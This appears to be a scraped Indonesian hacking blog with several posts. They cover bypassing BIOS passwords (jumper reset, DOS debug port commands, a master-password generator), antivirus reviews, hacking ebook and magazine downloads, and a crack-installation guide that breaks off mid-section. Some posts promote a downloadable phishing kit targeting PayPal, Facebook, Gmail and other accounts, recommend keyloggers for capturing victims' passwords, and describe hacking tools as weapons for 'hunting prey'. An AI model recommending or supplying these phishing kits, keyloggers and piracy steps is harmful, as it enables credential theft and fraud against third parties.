9
Hack Password Bios

.
Ada beberapa cara yang dapat digunakan untuk mereset Password pada Bios. Dari cara manual dengan bongkar pasang batere sampai cara unik membongkar password pada laptop. Oke langsung saja akan saya bahas satu persatu dari yang paling mudah sampai yang sedikit rumit namun sebenarnya asik untuk dicoba.

1. Clear CMOS
Cara ini kuanggap cara paling kuno sekaligus paling mudah untuk menjebol password pada BIOS. Langkahnya mudah saja, pertama buka casing penutup CPU komputer. Kemudian cari Batere bios yang bentuknya mirip-mirip dengan batere jam cuma sedikit lebih gede. Setelah ketemu perhatikan daerah di sekitar batere biasanya terdapat jumper dengan 3 pin, 2 pin terhubung dan 1 pin tidak.

Misalkan 3 pin tersebut dengan kode 1 - 2 - 3. Posisi konektor awal yang terhubung biasanya adalah 2 - 3. Untuk mereset bios caranya pindahkan posisi konektor yang menghubungkan pin 2 - 3 ke posisi 1 - 2 selama kurang lebih 5 detik. Kemudian pasang kembali ke posisi awal (2 - 3). Coba restart kembali komputer, dijamin password bios sudah lenyap.

Jika cara di atas terlihat rumit, mudahnya untuk menclear cmos adalah dengan mencopot batere BIOS kemudian memasangnya kembali. Namun dengan konsekuensi mencopot label garansi pada batere bios tersebut.

2. Reset lewat DOS
Cara kedua yang biasa digunakan adalah mereset password bios melalui command prompt DOS. Masuk terlebih dahulu ke DOS dengan mengakses Start - All program - accessoris - Command Prompt. Atau untuk lebih cepatnya masuk ke run - cmd.

Setelah jendela command prompt muncul, ketik debug kemudian enter. Lanjutkan dengan menjalankan perintah berikut ini.

o 70 10
o 71 20
quit
exit


Lihat hasilnya, bios yang terpassword telah menghilang dari pandangan.
catatan: Jika tidak bisa masuk ke windows untuk mengakses command prompt dapat dilakukan melalui safe mode with command prompt yang bisa diakses dengan menekan tombol F8 sebelum login windows.

3. BIOS_PW
Cara ketiga ini menggunaan software ini sangat manjur untuk jenis BIOS phoenix, misalnya BIOS yang digunakan pada laptop Acer. Untuk menggunakanya harus menggunakan komputer lain yang normal.

Download terlebih dahulu softwarenya disini. Ekstrak hasil file BIOS.rar yang telah di download kemudian pindahkan file BIOS_PW.exe ke partisi D:

Masuk ke BIOS komputer yang BIOSnya terpassword. Tekan saja tombol enter berulang ulang sampai muncul pesan "system disabled [14662]". (kode error)

Langkah selanjutnya masuk ke komputer yang telah dicopykan software BIOS_PW.exe ke direktori D: . Masuk ke command prompt kemudian ketik perintah berikut ini.

D:
BIOS_PW 14662 0

Maka akan muncul beberapa kombinasi password yang bisa digunakan untuk membuka password phoenix tersebut.
Selamat mencoba

Bookmark and Share



4
Internet Security Terbaik 2010

.
Internet Security merupakan program pelindung komputer jaringan baik server atau client dari serangan pihak-pihak yang tidak memiliki otoritas seperti hacker, virus, spyware, adware, trojan, malware, spam dan berbagai program jahat lain yang bertujuan untuk mengambil alih otoritas administrator.

Internet security didesain seperti anti virus, anti spyware, anti spam, anti malware, firewall, parental control, dll namun dengan kemampuan yang lebih lengkap dan menyeluruh. Internet security merupakan paket software keamanan dan pelindung komputer jaringan menyeluruh. Internet secuirty juga bisa disebut sebagai benteng pertahanan antara komputer dan internet. Hanya program tertentu yang diizinkan berkomunikasi antara komputer dan internet. Program yang mencurigakan dan merusak akan dihalau oleh adanya software internet security.

Terdapat beragam software Internet security yang ditawarkan. Namun ada 10 software internet security yang memiliki perlindungan terbaik tahun ini, yaitu:

1. Kaspersky Internet Security
Kaspersky Internet Security 2010 merupakan paket Internet Secuirty terbaik menurut beberapa survey yang dilakukan beberapa vendor keamanan dunia. Kaspersky Internet Security menyuplai hampir semua kebutuhan keamanan internet yang dibutuhkan user.
Kaspersky Internet Seciruty dapat diinstal baik di sistem operasi Windows, baik windows XP, Vista maupun Windows 7. Proses instalasinya juga berjalan cepat dan ringan. Kelebihan lain yang ditawarkan Kaspersky Internet Security adalah pembelian satu lisensi yang dapat difungsikan untuk tiga komputer sekaligus. Lebih hemat bukan. Namun yang terpenting, Kaspersky Internet Security mampu memenuhi semua kebutuhan perlindungan jaringan dalam satu paket sekaligus.

2. BitDefender Internet Security
Bit Defender Internet Security 2010 menyediakan kebutuhan penjadwalan scan, backup, tune-up, update untuk mendapatkan perlindungan keamanan maksimum. BitDefender Internet Security 2010 melindungi aktifitas internet anda dengan aman tanpa memakan banyak ruang memory komputer.
Kemampuan perlindunganya seperti mengunci virus, hacker, spam, parental control dan proteksi firewall. Dengan fitur keamanan baru BitDefender Internet Security 2010 melindungi anda ketika mendownload, membagikan atau membuka file dari teman, tempat kerja atau umum. Mengekskripsi komunikasi yang anda lakukan dengan baik, menyembunyikan identitas dan proteksi pesan instan.
BitDefender Internet Security 2010 sangat baik digunakan oleh mania games yang membutuhkan perlindungan namun tidak memperlambat kecepatan komputer. BitDefender Internet Security 2010 memenuhi kebutuhan tersebut.

3. ZoneAlarm Internet Security
ZoneAlarm adalah pelopor perlindungan firewall untuk komputer pribadi yang telah digunakan hampir 60 juta pengguna komputer dunia. Kemampuan lain ZoneAlarm Internet Security adalah perlindungan terhadap virus dan spyware. ZoneAlarm Internet Security sangat cocok diinstal pertama kami komputer digunakan, karena jika penginstalan setelah komputer terinfeksi semuanya akan menjadi terlambat. ZoneAlarm Internet Security melindungi komputer secara berlapis dari awal hingga akhir.

4. Norton Internet Security
Norton Internet Security adalah salah satu produk Symantec yang namanya di industri keamanan sudah tidak asing lagi. Pengalaman perindungan keamanan komputer menjadi kelebihan utama Norton Internet Security. Dengan paket antivirus dan anti spyware terbaik, serta user interface yang mudah digunakan membuat Norton Internet Security menjadi pilihan menarik Internet Security.

5. CA Internet Security
CA Internet Security Suite Plus memberikan perlindungan luar biasa dari serangan internet, instrusi dan berbagai ancaman yang dapat melumpuhkan komputer anda.
CA (Computer Associates software) memastikan file foto, video, musik dan dokumen anda tersimpan aman dengan perlindungan backup, transfer dan restore yang bisa dilakukan antar komputer.

6. Trend Micro Internet Security
Trend Micro Internet Security Pro atau lebih dikelal dengan PC Cillin mempersembahkan banyak fitur keamanan untuk melindungi komputer agar tetap utuh dari serangan pihak luar.
Program pembersih yang disertakan mampu melakukan otomatisasi backup sistem terjadwal, membersihkan registry, menghapus sisa-sisa cookies dan melenyapkan browsing history. Fitur menarik lain yang bisa ditemukan pada Trend Micro Internet Security Pro adalah adanya Wifi Protection dan Smartphone Protection.

7. ESET Smart Security
ESET Smart Security didesain sebagai software proteksi keamanan lengkap untuk melindungi komputer dari infiltrasi dan serangan. ESET Smart Security bukan hanya kumpulan program- program keamanan, kemampuan lainya adalah menjalankan beberapa program sekaligus pada tread berbeda. Sangat efektif untuk komputer dengan multiple program.
ESET Smart Security tertopang oleh tiga perlindungan utama, yaitu: ESET NOD32 Antivirus + Antispyware, ESET Personal Firewall dan ESET Anti Spam.

8. PC Tools Internet Security
PC Tool Internet Security adalah All-in-one security suite yang mendapat penghargaan sebagai Anti Spyware terbaik (Spyware Doctor), anti-virus, firewall dan spam protection. PC Tool Internet Security menyediakan hampir semua kebutuhan pelindungan keamanan jaringan hanya dalam satu paket komponen tanpa terpisah.
Perlindungan yang dilakukan diantaranya: spyware, adware, virus, Trojan, worm, keylogger dan berbagai ancaman online lainya.

9. Panda Internet Security
Panda Internet Security adalah paket kemanan yang membuat anda merasa nyaman berselancar di internet tanpa keraguan. Perlindungan umum dari viruse, spyware, rootkit, hacker, dan penipuan online. Fitur anti spam yang disertakan mampu melindungi kotak masuk e-mail anda dari serangan spam.
Bagitu juga fasilitas parental control yang mampu melindungi anak- anak dari aktifitas berinternet secara tidak sehat. Panda Internet Security versi terbaru juga terasa lebih cepat dari sebelumnya.

10. AVG Internet Security
AVG Antivirus Free Edition adalah salah satu anti virus yang paling banyak diunduh pengguna komputer di dunia. Ini membuktikan bahwa AVG Internet Security pasti memilki kemampuan lebih untuk melindungi celah keamanan internet. AVG Internet Security 9.0 adalah versi terbaru dengan banyak penambahan fitur dan kecepatan.
Beberapa kemampuan AVG Internet Security yang populer adalah melindungi dari pencurian identitas, Link Scanner yang memeriksa halaman web sebelum diakses dan perlindungan gamer.

Selain 10 Internet security di atas, masih banyak lagi berbagai software Internet Security lain dengan kemampuan menawan seperti : McAfee Internet Security, Norman Security Suite, BullGuard Internet Security Suite, Comodo Internet Security dan lain-lain.
Namun dari berbagai komentar pengguna, 10 Internet Security di atas yang memiliki rekor penilaian baik.


Bookmark and Share

16
Phising dan FakeLogin pupuler

.
Teknik Phising menggunakan metode fake login atau halaman jebakan adalah teknik hacking populer untuk menjerat username dan password. Teknik yang membutuhkan pendekatan psikologis ini sangat kental dengan Spam. Keduanya memang seperti api dan bensin, benar-benar cocok kalau dipasangkan. Bahaya phising, fake login dan spam sudah tidak diragukan lagi. Banyak sekali korban berjatuhan terutama bagi pengguna baru di internet. Bagi yang ingin mengoleksi script fake login dan mempelajari teknik phising lebih detail anda bisa mendownload koleksi phising dan fake login pada akhir artikel ini.

Bagi yang merasa expert untuk memanfaatkan fakelogin dan phising secara mendalam, saya berikan referensi phising dan fakelogin dalam PHISING PACK 2009. Berikut daftar phising yang ada di dalamnya:

1. AnonymousMailer
2. Phisher Maker!
3. Jiffy Gmail Account Creator
4. Tarantula
5. RapidExtract
6. IP Hider Pack
7. Steam Phiser
8. Rapidshare Phiser
9. Friendster Phiser
10. Gmail Phisher
11. Habbo Phisher
12. Facebook Phisher
13. Photobucket Phisher
14. XboxLive Phisher
15. AIM Phisher
16. GaiaOnline Phisher
17. IMVU Phisher
18. AstaTalk Phisher
19. Warez-bb Phisher
20. Hotmail Phisher
21. Paypal Phisher
22. Runescape Phisher
23. youtube Phisher
24. dan lebih banyak lagi

DOWNlOAD PHISING PACK


Bookmark and Share


1
Program maintenance PC gratis terbaik

.
Program maintenance atau perawatan PC dibutuhkan untuk menjaga komputer tetap berjalan dengan normal. Sama seperti antivirus yang berfungsi sebagai pelindung keamanan, program maintenance membantu user dalam menyehatkan komputernya kembali setelah digunakan untuk bekerja seharian. Berikut saya bagikan 5 program maintenance gratis yang bisa anda gunakan sebagai tool perawatan berkala.


1. Advanced SystemCare Free

Advanced SystemCare Free adalah program mantenance terbaik dengan 35 juta download yang telah dilakukan semenjak diluncurkan pertama pada tahun 2006. Advanced SystemCare Free bekerja sangat baik hanya dengan menggunakan satu tombol CARE, maka pekerjaan maintenance seperti protect, repair, clean dan optimize bisa dilakukan sekaligus.
Advanced SystemCare Free dipastikan bebas adware, spyware atau virus dengan interface dan cara penggunaan yang mucah. Sebuah program maintenance gratis yang patut dimiliki untuk mengoptimalisasi kemampuan PC.
Download Advanced System Care


2. Glary Utilities


Glary Utilities adalah utilitas yang dapat difungsikan untuk membersihkan registry dan disk, proteksi privasi, akselesari kemampuan dan beragam tool multifungsi lainya. Glary Utilities juga mampu menghapus registry error yang membandel dibersihkan, merapikan cluster, optimalisasi kecepatan internet, melindungi file berharga dan meningkatkan kemampuan PC.
User interface yang ditampilkan juga mudah, tombol-tombol beserta fungsinya dijelaskan secara detail. Glary Utilities dibagi menjadi dua, navice untuk versi gratis dan profesioanal untuk yang berbayar. Perbedaanya hanya terletak pada kelengkapan fitur maintenance yang ditawarkan.
Download Glary Utilities


3. CCleaner

CCleaner adalah utilities dengan kemampuan dan kecepatan menawan. Dengan lebih dari 350 juta download, CCleaner dinobatkan sebagai free utilities terfavorit pilihan pengguna komputer.
CCleaner mampu membersihkan file system yang tidak terpakai di komputer, membersihkan hardisk, registry, pengaturan startup program dan uninstal program. Selain itu CCleaner dapat membersihkan sisa-sisa history dan cache setelah berselancar di internet.
Download CCleaner


4. Ashampoo WinOptimizer

Ashampoo WinOptimizer adalah salah satu tool optimisasi komputer dengan interface sederhana dan mudah digunakan. Ashampoo WinOptimizer difungsikan untuk menjaga komputer tetap berjalan cepat dan ringan selayak komputer pertama kali diinstal.
Download Ashampoo WinOptimizer


5. Comodo System Cleaner

Comodo System Cleaner adalah toolkit yang dapat mengoptimalkan komputer lebih cepat, lebih efisien dan lebih terlindungi. Dilengkapi dengan fasilitas diagnosis yang mampu menemukan masalah di komputer secara otomatis.
Comodo System Cleaner menyertakan bebarapa fitur maintenance windows seperti registry cleaner, disk cleaner, optimize system performance, dan monitoring process. Comodo System Cleaner tersedia untuk beragam sistem oprerasi windows, baik yang 32 maupun 64.
Download Comodo System Cleaner


Bookmark and Share



10
The Hacker's Underground

.
Ingin belajar menjadi hacker tapi tidak tahu memulai dari mana? Buku ini adalah salah satu jawabanya. The Hacker's Underground Handbook mengulas berbagai teknik hacking yang populer digunakan. Dari teknik hacking sederhana sampai pada teknik intermediate dan advanced. Disusun oleh David Melnichuk, pendiri blog yang membahas hacking dan keamanan. Anda dapat mengunjungi blognya di http://mrcracker.com.



Daftar isi buku The Hacker's Underground Handbook :

Pendahuluan
- Apa itu Hacker?
- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman
- Perlukah mempelajarinya?
- Dimana saya harus memulai?
- Cara belajar terbaik

Password
- Password Cracking
- Phising
- Program-program pencuri password

Network Hacking
- Foot Printing
- Port Scanning
- Banner Grabbing
- Searching the Vulnerabilities
- Penetrating

Wirelless Hacking
- Scanning wireless network
- Cracking WEP
- Packet Sniffing

Windows Hacking
- NetBios
- Cracking windows password

Malware
- Definisi
- Prorat

Web Hacking
- Cross site scripting
- Remote file inclusion
- Local file inclusion



Bookmark and Share

9
Tutorial Hacking Indonesia

.
E-code Magazine adalah majalah komputer, internet, hacking dan security bahasa Indonesia dengan media murni PDF. Seluruh materi X-Code Magazine dapat didownload, dibaca, dimodifikasi serta disebarluaskan secara bebas untuk tujuan bukan komersial, dengan syarat tidak menghapus atau mengubah atribut penulis. Tujuan E- code Magazine adalah menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan positif.

X-Code Magazine 01
Apakah kamu Hacker?. Kelemahan pada deep freeze standar 5.20 trial version. Membuat deepfreeze trial menjadi full. Memeriksa keamanan webserver. Menghubungkan internet melalui LAN dengan windows XP. Konfigurasi windows secara manual memakai regedit. Membuat program penampil text dengan bahasa assembler. Membuat program link website dengan turbo basic. Membuat program pilihan dengan turbo pascal. Membuat program tampil sederhana dengan C++. Tips dan trik IRC. Teknik hacking local root on fedora core2. Fungsi windows API. Diary.exe, apa dan bagaimana?. Implementasi teknik stealth pada virus. Connect back melalui bug CGI.
DOWNLOAD

X-Code Magazine 02
Utak-atik program dengan Reshack. Ovelclock VGA Card nVidia dengan RivaTuner. hacking database Visual Foxpro. Membuat program sharing files dan folder dengan visual basic. Melakukan decompiler program visual basic dengan VbReFormer. Pandungan menggunakan Yahoo Group. Browser folder server tanpa fungsi cmd. Searching isi database MySql via php script. 10 Penipuan terbanyak di internet. Waspada Keylogger warnet. MySQL Exploit via PHP Script. Cara menjual dan membeli E-Gold. Instalasi CMS CuteNews. Mengatasi spyware secara darurat. Small IMS.
DOWNLOAD

X-Code Magazine 03
Cara membuka akses keseluruhan database. Membuat file super hidden. Attack: Script sanitasi input. Instalasi Apache, PHP, MySQL pada system window XP. Lupa passsword Yahoo. Dasar Borland C++ Builder. Hack website shopping dengan Shopupload.asp. Deface dengan PHP bugs. Compilasi dengan LCC dan permasalahanya. Mencari alamat target In One Hosting.
DOWNLOAD

X-Code Magazine 04
Mengakses registry dari DOS. Tutorial AJAX untuk mempercepat akses situs. Mempercantik tampilan UFD. Gutbai.exe. Teknik cracking CD-Lock. Kelemahan folder yang dilock. Mod_rewrite pada Apache. Koneksi Oracle dengan PHP. SSH Forwading. Mendisable account di windows xp. Membobol billing explorer versi 4.38.
DOWNLOAD

X-Code Magazine 05
Instalasi Oracle10g di Linux RHELAS3. Instalasi webserver IIS. Modifikasi file executable dengan PE explorer. Memberi logo pada properties My Computer. Mencurangi semua jenis billing warnet. Membuat web dengan Aura CMS. Mengatur sistem komputer tanpa melalui registry. Proteksi file exe dari virus. Teknik hacking winrar v3.62. mod_rewirte untuk wordpress. Trojan dan remoter PC berbasis windows. Melakukan jebakan hacking friendster.
DOWNLOAD

X-Code Magazine 06
Mengenal Hexadecimal, Binary dan ASCII. Honeypot. Animasi GIF dengan Adobe Image Ready. Membuat file yang mencurigakan. Tip-trik animasi marquee. Modifikasi aplikasi dengan PE Explorer dan ResHacker. Animasi Marquee dengan Frontpage. Sending fake SMS number dengan Alpha. Pemrograman HACK. Chatting Mirc dengan Handphone. Memanfaatkan kelalaian admin pada xWin. Liputan demo Hacking.
Download

X-Code Magazine 07
Pemrograman HACK Tool II. Bermain internet dengan aman. Tip-trik membuat Skin WInamp. Cracking translator XP Enterprise edition. Membuat software portable. Password Cracking. Menembus proteksi ebook Studio kata-kata. PHP Injection!. BOT Scanner. Crack planet source code combo CD. Liptan seminar hacking. Liputan demo hacking. Liputan lomba hacking.
DOWNLOAD

X-Code Magazine 08
10 Tools favorit Hacker dan pakar keamanan komputer. Virtual Box. Merebut admin pada sistem operasi. Mempercepat firefox. Menjebol password PC Security. Pemrograman Hack Tools III. Membuat tips of the day saat logon. Membuat anti viur pada flash disk. Digital blaster dan network flooder.
DOWNLOAD

X-Code Magazine 09
XRemote vers2.0. Transfer file via bluetooth di linux. Membuat program pembaca teks dengan visual basic. Cracking software. Crack style XP versi 2.0. Pemrograman Hack Tools versi IV. Progam sederhana dengan Turbo Pascal 7.0 for DOS. Membuat windows menjadi kota mati. Mengubah isi regedit yang didisable oleh admin. Mengubah tampilan Internet Explorer. Efek animasi Teks Glow dengan adobe flash.
DOWNLOAD

X-Code Magazine 10
Ubuntu 8.04. Beetrap V.1.0 untuk komputer pribadi. Bot Perl, DDOS dan mass scanning. Mengubah format nilai textbox secara massal. Virus dengan VBS Generator. Manual Cheat game Alien Shooter. Shutdown komputer via web menggunakan HTML+VB Script. Membobol password PC Security. Membuat Keygen untuk TestCodeWarrior. Mengamankan file penting. Mengganti Mac Address Network Card dengan Macchanger. Mengakali masa pakai Nitro PDF. Pemrograman HACK V. Membanjiri pesan ke HP melalui bluetooth. Cara curang cepat drop entrecard. Membuat program kamuflase folder dengan visual basic. Menambah dan menghapus item pada menu klik kanan.
DOWNLOAD

X-Code Magazine 11
Tes aplikasi lunak buatan programmer lokal. YF- Crypt V1.0. Wirelles Hacking di linux. Manual crack s40 theme studio. Tips mereset kapasitas USB Flashdisk yang penuh. Pemrograman Hack Tools VI, port scanner. Cracking Audio Editor pro. Intup folder yang diproteksi Folder Access Ver.2.0. Memunculkan kembali file super hidden. Hack Deep Freeze 6. X-Code Linux. cracking software pulsa refill master 239. Penggunaan IDM - Site Grabber. Bypassing firewall windows XP SP2. Membobol database billing explorer. Blind SQL Injextion. Dasar- dasar phising. Membuka semua fitur windows. Backdooring target dengan Connectback.
DOWNLOAD

X-Code Magazine 12
YF-Keylogger vers.1.0. YF-KeyInMyFD vers.1.0. Cracking ASCII Adt Maker 1.6. Mencegah Virus VBS berkembang biak. Trik membaca password foleder lock. Reset passsword software direktory security. Pengunci folder dengan Batch Programming. Tampilan dekstop lebih atraktif dengan javascript. Mengubah akses limited menjadi administrator pada windows XP. Hacking remote komputer dari jarak jauh. Memoles windows XP saat logon. Mencuri ebook dengan kekuatan pikiran. Spoonfed Hacking-How to crack WEP. Pemrograman Hack Tools VII. Empat langkah mudah SQL Injection. Menjalankan file phyton pada hacked server. Mengubah document root pada localhost. Membuat Keylogger sendiri. Mengunci windows. Membuat program management IP.
DOWNLOAD

X-Code Magazine 13
Mengembalikan password Windows XP/Vista dengan Ophcrack live CD. Botnet. Cracking Plato Video. Browsing, The way I am. Membuat program pembajak isi Flash Disk. Mengenal PPI Card 8255 MODE 0. Program COntrol 12 LED. Mengganti pesan Welcome di Windows Logon. Penggunaan shell script dalam jaringan. XCode Web Linker. FD Protect Guard. Key Generator untuk aplikasi PDF Password Remover. Blind SQL Injection Joomla. Membuat Regedit alternatif. Melewati multi proteksi akses web www.indowebster.com. Menampilkan kembali data yang tersembunyi dengan Total Commander.
DOWNLOAD

X-Code Magazine 14
Intip password Rampok V.2.0. Cracking Game House 2008. Teknik cracking Hex Workshop. Mengubah gambar pada booting Slax Portable USB Linux. Mencuri data penting dengan USB Flash drive. Menyamar sebagai Googlebot via mozilla firefox. Packer Checker. Menembus proteksi password pada program dengan trik Win32 Hook. MakeCAB dan Expand dengan VB6. Menyembunyikan folder pribadi dibelakang foto. Menghidupkan windows yang menjadi kota mati. Rahasia dibalik ekstensi *.*zip. Cracking LC3 - password editing & recovery tools. cara unik hindari virus.
DOWNLOAD

Source: x-code

Bookmark and Share



12
Tutorial Hacking Terbaik

.
Ebook hacking adalah sarana belajar yang cukup baik bagi seorang hacker pemula (newbie). Setidaknya teknik-teknik dasar yang dijelaskan di dalamnya menjadi pondasi kokoh untuk beranjak ke tingkat lebih tinggi. Tidak perlu bingung mencari ebook hacking yang mengulas berbagai teknik hacking dasar. Para sesepuh hacker dengan senang hati membundlenya dalam satu paket siap download. Namanya Hacking E-book AIO.


Hacking E-book AIO berisi kumpulan ebook hacking populer. Dari dasar-dasar hacking, hacking administrator, hacking web, hacking game console, sampai hacking wireless. Anda tidak perlu lagi mencari kesana-sini ebook hacking. Tinggal download semua sudah tersedia.

Berikut koleksi ebook hacking yang ada di dalamnya:

Hacking for Dummies
Hacking Intranet Websites
Hacking Techniques
Hacking The Cable Modem
Hacking The Linux
Hacking Web Applications
Hacking Windows XP
Hacking PSP
The Art of Deception
The Art of Intrusion
Network Security Hacks
Paypal Hacks
PC Hacks
Simple Hacks
The Database Hacker Handbook
Wireless Hacking
Wireless Hacks
Bluetooth Hacking
Ethical Hacking
Google Hacks
Hack & Crack
Hack Attacks Testing
Hack IT
Hack Proofing Your Network 1st
Hack Proofing Your Network 2nd
Hack Proofing Your Web Server
Hack The Net
Hack Xbox 360
Hackers Black Book
Hacking Firewalls And Networks
Hacking a Coke Machine
Hacking and Network Defense
Wireless Network Hacks & Mods

DOWNLOAD Hacking E-book:
LINK 1 (Rapidshare)
LINK 2 (Hotfile)
Link 3 (Uploding)


Bookmark and Share

3
Memperbaiki masalah windows XP

.
Terdapat beragam tool untuk memperbaiki permasalahan pada Windows XP. Namun kebanyakan tool tersebut hanya dapat mengatasi satu atau dua masalah yang ada, misalnya mengembalikan Task Manager saja atau Registry editor saja. Masalah tersebut timbul karena serangan virus. Biasanya setelah virus dihilangkan masalah tersebut tetap ada, oleh karena itu dibutuhkan tool untuk memperbaikinya.

XP Quick Fix 1.0 adalah tool yang didesain untuk memperbaiki beragam permasalahan yang sering ditemukan pada Windows XP setelah setelah virus menyerang komputer. XP Quick Fix berjalan secara portabel sehingga tidak perlu proses instalasi untuk menggunakanya. Anda cukup langsung menjalankan program kecil ini kemudian klik salah satu permasalahan yang anda temukan di komputer anda.

DOWNLOAD XP Quick Fix


Bookmark and Share


6
1000 Ebook Lengkap Teknik Hacking

.
Sangat sulit mencari tutorial Hacking secara lengkap. Apalagi jika anda adalah seorang newbie. Saya sarankan untuk mengunjungi dan bergabung di forum-forum hacking terkenal seperti Kaskus.us, Indowebster.com, Astalavista atau X- Code (forum hacking Indonesia). Pada forum tersebut dijelaskan ratusan teknik hacking populer yang banyak digunakan. Namun hal tersebut masih repot karena harus tetap online untuk mengupdate infomasinya.

1000 Hacking Tutorial merupakan ebook yang berisi kumpulan teknik hacking populer yang banyak digunakan. Dalam ebook direktori sebesar 10MB tersebut tersimpan lebih dari 1000 teknik hacking. Anda bisa mencobanya satu persatu. Saya jamin kompulan teknik hacking yang terangkum dalam ebook ini mampu mengubah pola pikir anda untuk memasuki dunia hacker.

Berikut beberapa teknik hacking yang dijelaskan dalam buku ini:

- Membuat Bootable XP dalam sebuah CD
- Membuat shortcut One Click Shutdown dan Restart
- Membuat Universal Ghost dalam CD maupun FD
- Teknik Debuging
- Menghapus file yang tidak dapat terhapus
- Panduan pemilihan kamera digital
- Konsep DirectX
- Teknik kompresi
- Teknik menghilangkan Send Error Report
- Teknik memanipulasi logi windows
- Download musik secara lagal
- Download paypal tanpa membayar
- Download dari FTPz
- Download MP3 tanpa filesharing
- Download Video dan MP3 dengan Media Player
- Download Timeframe
- DVD Copy-Ripping
- Teknik disconnect dan reconnect fari broadband
- Teknik mudah mencari serial number dengan Google
- Teknik Hacking Ebay
- Keyboard Shortcut
- Hacking administrator windows
- Teknik Hacking unlimited bandwidth dari hosting gratis
- Google Hacking
- Google tips dan trik
- Rahasia Google
- Memperbaiki Harddisk
- Hardware Firewall
- Teknik Memblok website tanpa software
- Tweeking windows
- Teknik Hacking Bios
- Konversi file system
- Teknik SEO
- Key Generator
- Menghapus DRM Protection Video
- Teknik pencarian Rapidshare
- Teknik menyembunyikan files
- Menyelamatkan komputer dari crash
- Setting DNS
- Setting FTP server
- Setting direct connect
- Setting proxy
- Setting http request
- Hacking Newsgroup
- Linux
- Menginstal Linux
- Hacking IRC
- Mencari file di IRC
- Hacking E-mail
- Phising
- Keylogger
- Hacking foto
- Hacking database
- Hacking faq
- Hacking TRW
- Hacking wabpages
- Hacking Netbios
- Phreaking
- Spyware
- Virus
- Trojan
dan seterusnya

DOWNLOAD 1000 Teknik Hacking:
- LINK DOWNLOAD 1
- LINK DOWNLOAD 2
- LINK DOWNLOAD 3
- LINK DOWNLOAD 4


Bookmark and Share



9
3 Software Keylogger terbaik

.
Keylogger secara konsep dapat anda baca pada artikel saya sebelumnya. Keylogger adalah software atau hardware yang dapat merekam aktifitas yang anda lakukan di depan komputer. Keylogger umumnya digunakan oleh hacker untuk memperoleh informasi yang bersifat privacy seperti username dan password. Keylogger yang hebat biasanya bekerja secara remote pada sebuah jaringan. Keylogger jenis ini dapat memonitor beberapa komputer korban sekaligus tanpa menyentuh hak akses secara fisik.

Berikut 3 software keylogger terbaik yang banyak direkomendasikan oleh beberapa hacker, beberapa diantaranya adalah free edition.

1. Refog

2. Revealer Keylogger Free Edition

3. ActMon Process Monitoring




Bookmark and Share







8
Tools Hacking terbaik

.
Tools hacking seperti sebuah senjata bagi seorang hacker. Tools hacking akan berfungsi sebagai alat untuk membunuh lawan dengan cara lebih mudah. Pada artikel sebelumnya, saya telah memberikan koleksi Ebook hacking terbaik. Jika ebook adalah pedomanya, maka tools hacking adalah senjatanya. Keduanya sangat berguna untuk proses perburuan mangsa.


Berikut isi koleksi top 10 vital hacking software and tools:
- Cain and Abel (sniffer)
- John the Ripper (brootforce)
- NetStumbler (Wifi breaker)
- Nmap (Network scanner)
- Putty (Telnet)
- SuperScan (Scanner & pinger)
- Hping (Pinger)
- Lcp (brute force password)
- Nikto (scanner broken web server)
- Kismet (sniffer wireless network 802.11)

Download Disini

Source: idecapung

Bookmark and Share






23
Kotak Komentar via Facebook Connect

.
Facebook Connect seperti yang saya bahas sebelumnya disini merupakan salah satu alternatif untuk mempermudah pembaca meninggalkan komentar. Sesuai yang saya janjikan beberapa hari lalu untuk membahas cara pemasangan Facebook Connect yang terintegrasi pada blog dengan fasilitas dari website disqus, dan sekarang mari kita langsung ke pembahasannya.

1. Daftar Disqus

2. Pada bagian home klik Add Website. isi Website URL,Website Name dan Short name

3. Setelah itu silakan pilih platform blog Anda

4. Di halaman selanjutnya adalah petunjuk penginstalan

Sampi tahap ini Anda sudah dapat melihat kotak komentar baru seperti kotak komentar wordpress yang berisikan name, email, dan url tetapi masih belum tersedia facebook connect.

5. Masuk halaman admin > setting, akan ada pilihan feature termasuk Facebook Connect. Centang kotak facebook connect dan Anda akan diminta "Enter Facebook API Key"

6. API Key didapat setelah Anda membuat sebuah aplikasi Facebook disini, beri nama pilih agree dan save

7. Di halaman edditapp anda akan mendapatkan API Key. Copy, paste pada halaman setting disqus (langkah no.5) dan save

8. Kembali ke edditapp klik pada link connect (sebelah kanan), silakan isi connect url dengan alamat blog, base domain dengan alamat blog tanpa http://misal "namaanda.blog.com" dan klik save changes


Bookmark and Share



6
Perbedaan Antara Crack, Patch, Keygen?

.
Jika Anda pernah menggunakan atau mendownload software bajakan yang langsung full version, pasti Anda sudah tidak asing lagi dengan nama “crack”. Ya, “crack” lah yang dapat membuat software Anda menjadi full version secara illegal. Namun apakah Anda juga pernah menggunakan “patch” agar software Anda menjadi full version? Bagaimana dengan “keygen”? Apakah Anda juga pernah menggunakannya?

Ketiga nama aneh yang Saya sebut tadi (crack, patch, keygen) merupakan sesuatu yang biasanya Anda temui jika mencari atau mendownload software full version secara illegal. Namun apa sebenarnya perbedaan dari mereka bertiga?

Mari kita bahas satu persatu.

1. Crack

Crack dalam bahasa inggris berarti pecahan / retakan. Sama seperti artinya, crack merupakan bagian dari suatu software yang sudah dirubah isinya oleh seseorang / kelompok. Kebanyakan, bagian yang dirubah isinya oleh “cracker” adalah file executable (*.exe) suatu software, namun ada juga yang merubah isi file library (*.dll). Oleh karena itu, file crack umumnya berekstensi (*.exe) atau (*.dll). Hal ini juga yang menjadi kelemahan suatu crack, kebanyakan crack tidak dapat dipakai pada versi software yang berbeda.

Crack fungsinya bukan hanya dapat membuat software menjadi full version saja, namun juga ada crack untuk game yang dapat membuat game yang seharusnya memerlukan CD original game tersebut, menjadi tidak memerlukan CD lagi. Biasanya crack itu disebut “NoCD-Crack atau NoDVD-Crack”.

Cara menggunakan crack cukup mudah, Anda cukup menginstall softwarenya, lalu mengopy file cracknya ke tempat software tadi di install (me-replace file asli).

Contoh: Anda menginstall software “A” pada folder “C:Program FilesA”, jika Anda punya crack software tersebut, dan cracknya bernama “A.exe”. Anda cukup menaruh file “A.exe” pada folder “C:Program FilesA”. Jika ada peringatan Confirm File Replace, Anda hanya tinggal pilih “Yes”.

Pembuat crack pada umumnya bekerja berkelompok, mereka membuat sebuah “Cracker Team” dengan suatu nama. Jika mereka sudah membuat suatu crack, mereka akan merilisnya pada suatu situs khusus koleksi crack. Mereka juga memberi tanda pada crack yang mereka rilis, biasanya mereka memberi tanda dengan memberi file berisi informasi mereka berekstensi .nfo.

2. Patch / Patcher

